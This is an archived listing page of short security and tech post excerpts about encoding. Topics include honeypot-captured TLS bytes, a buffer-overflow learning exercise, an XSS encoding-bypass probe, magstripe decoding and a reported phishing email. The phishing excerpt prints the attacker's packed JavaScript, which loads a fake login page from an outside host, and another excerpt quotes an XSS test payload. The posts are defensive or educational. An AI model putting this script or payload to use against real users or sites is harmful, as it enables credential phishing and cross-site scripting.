encoding – Page 22 – WindowsTechs.com

How do I decode this hex encoded string with non-hex characters that I got from a botnet? [on hold]

Posted on April 17, 2017 by Mark Read

I am running a honeypot and I got the following string:

‘\x16\x03\x01\x01.\x01\x00\x01*\x03\x03\xf2\xbd\x89\x19A”\xbe\xfa\xd4~/\xdb\xd9\xe6\xe7tD\x16/\x12\xb5?\xb6\xf5%\xac\xf1\xd96\x18\x10c\x00\x00\xac\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\x00\xa5\x00\xa3\x00\xa1\x00\x9f\x00k\x00j\x00i\x00h\x009\x008\x007\x006\x00\x88\x00\x87\x00\x86\x00\x85\xc02\xc0.\xc0*\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0/\xc0+\xc0\’\xc0#\xc0\x13\xc0\t\x00\xa4\x00\xa2\x00\xa0\x00\x9e\x00g\x00@\x00?\x00>\x003\x002\x001\x000\x00\x9a\x00\x99\x00\x98\x00\x97\x00E\x00D\x00C\x00B\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\xc0\x12\xc0\x08\x00\x16\x00\x13\x00\x10\x00\r\xc0\r\xc0\x03\x00\n\x00\xff\x01\x00\x00U\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x1c\x00\x1a\x00\x17\x00\x19\x00\x1c\x00\x1b\x00\x18\x00\x1a\x00\x16\x00\x0e\x00\r\x00\x0b\x00\x0c\x00\t\x00\n\x00#\x00\x00\x00\r\x00
\x00\x1e\x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x00\x0f\x00\x01\x01’

When I try to decode this usimg python’s .decode(“hex”) I get the following error:

Non-hexadecimal digit found

I also have another string:

“\x16\x03\x03\x00\xcc\x01\x00\x00\xc8\x03\x03X\xf2e\x9c\x11\x89\x07\x86\xc6\xe5\xf4\xa5\xef\xf8$\xdf\xd2Ul\xeeGw\x83yID\xd7\x8b\xd4\xf4\xba\x1a\x00\x00<\xc0,\xc0+\xc00\xc0/\x00\x9f\x00\x9e\xc0$\xc0#\xc0(\xc0’\xc0\n\xc0\t\xc0\x14\xc0\x13\x009\x003\x00\x9d\x00\x9c\x00=\x00<\x005\x00/\x00\n\x00j\x00@\x008\x002\x00\x13\x00\x05\x00\x04\x01\x00\x00c\x00\x00\x00*\x00(\x00\x00%auth.api.sonyentertainmentnetwork.com\x00\n\x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00\x00\r\x00\x14\x00\x12\x04\x01\x05\x01\x02\x01\x04\x03\x05\x03\x02\x03\x02\x02\x06\x01\x06\x03\x00#\x00\x00\x00\x17\x00\x00\xff\x01\x00\x01\x00”

And with this one I get this error:

Odd-length string

How do I decode these strings?

Continue reading How do I decode this hex encoded string with non-hex characters that I got from a botnet? [on hold]→

Storing salted&hashed passwords – file encoding/encryption?

Posted on March 15, 2017 by jrefior

Setup: Say I’m properly generating a password hash (e.g., concatenating it with a /dev/urandom salt and a local secret and hashing it with bcrypt), now I go to store the result in a “user information” file containing name, us… Continue reading Storing salted&hashed passwords – file encoding/encryption?→

Pancake-ROM: Eat-only Memory?

Posted on February 21, 2017 by Elliot Williams

You can store arbitrary data encoded in binary as a pattern of zeros and ones. What you do to get those zeros and ones is up to you. If you’re in a particularly strange mood, you could even store them as strips of chocolate on Swedish pancakes.

Oddly enough, the possibility of the pancake as digital storage medium was what originally prompted [Michael Kohn] to undertake his similar 2013 project where he encoded his name on a paper wheel. Perhaps wisely, he prototyped on a simpler medium. With that perfected, four years later, it was time to step up to …read more

Continue reading Pancake-ROM: Eat-only Memory?→

Figure out custom magstripe encoding

Posted on February 1, 2017 by Samu

I have a magnetic stripe card reader that support three standard encodings: ISO, AAMVA and Ca DMV.

For research purposes I’m trying to read a magnetic stripe card which doesn’t seem to be encoded whith any of those standard… Continue reading Figure out custom magstripe encoding→

Where to find the exact specification for sha512 "values"?

Posted on January 20, 2017 by GhostCat

I am currently working my way into hashing with SHA512.

To my knowledge, the result of such hashing is often passed around as a string in this format

$6$salt$hashed-secret

And now I am simply wondering: within this string… Continue reading Where to find the exact specification for sha512 "values"?→

Exploiting a buffer overflow in ubuntu terminal

Posted on January 17, 2017 by DrPrItay

I’m trying to exploit some buffer overflow through linux terminal of a program I’ve written for self education. I’m inputting a string usnig scanf(“%s”) and my goal is to overrwrite the return address over the stack frame
my … Continue reading Exploiting a buffer overflow in ubuntu terminal→

type of encrytpion used [on hold]

Posted on January 14, 2017 by gafar

did you know the type of encryption/encoding use to encode this data

q4j4k58416u5g4k5j413x213d414c4z2o254m4c3f4i5f5k4j5h4e5f4m52393q4d3s373f2i3e3x3a3s4m305m30565u3w4i3z2m4s4m5m5m573h344a4r254b4b4w2e4p4m574462354m5d443m4m4h4e… Continue reading type of encrytpion used [on hold]→

Bypassing HTML encoding

Posted on January 10, 2017 by white hats

I am testing a web application where the server accepts special characters like @#$*, but when I insert double / single quotes, the server HTML encodes it.

(“test">%3Cscript%3Ealert('XSS')%3C%… Continue reading Bypassing HTML encoding→

Spam Email with Script not Flagged

Posted on January 5, 2017 by Dave B

Our office received an email over Christmas. There was what appeared to be a PDF file attached.

When we examined the file it was actually a Html file for a spoof google login page.

It also had a large amount of encoded <Script>

The decoded script is:

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘3.2.b=”8\’a g r l”;k{(j(){m 1=3.2.n(\’1\’);1.p=\’o/x-4\’;1.i=\’9 4\’;1.h=\’6://c.f/d/q/D/H.G\’;2.s(\’F\’)[0].I(1)}())}J(e){}3.2.K.L=”<5 E=\”6://w.v/u/t.y\” z=\”C: 0;B: 7%;A:7%\”>”;’,48,48,’|link|document|window|icon|iframe|http|100|You|shortcut|ve|title|kitt|assets||ai|been|href|rel|function|try|out|var|createElement|image|type|img|signed|getElementsByTagName|daiso|vasdu|top|bowlanreedesntal||html|style|height|width|border|guoguo|src|head|ico|google|appendChild|catch|body|outerHTML’.split(‘|’),0,{}

Interestingly the URL in the HTML file was to the correct google login page

I thought that emails with scripts would be flagged automatically, akin to sending an .exe or .bat file

Are there any additional precautions we can take to ensure that messages such as this are flagged or moved to spam in future without user intervention?

Continue reading Spam Email with Script not Flagged→

Script Your Way Out Of Video Editing Drudgery

Posted on November 26, 2016 by Gerrit Coetzee

[Victor Frost] has a deep voice and a fancy top of the line camera. While one would assume this to be a more than generous situation for life to put a person in; it’s got its own set of problems. Mainly that his fantastic fancy camera uses the most modern version of the popular h.264 encoding scheme, h.265. Gasp!

While that too seems like a pro, unfortunately h.265 doesn’t play as nice with his editing software. The solution seems easy, just transcode it and get on your way. However, when you start talking about transcoding 4K video from a top-of-the …read more

Continue reading Script Your Way Out Of Video Editing Drudgery→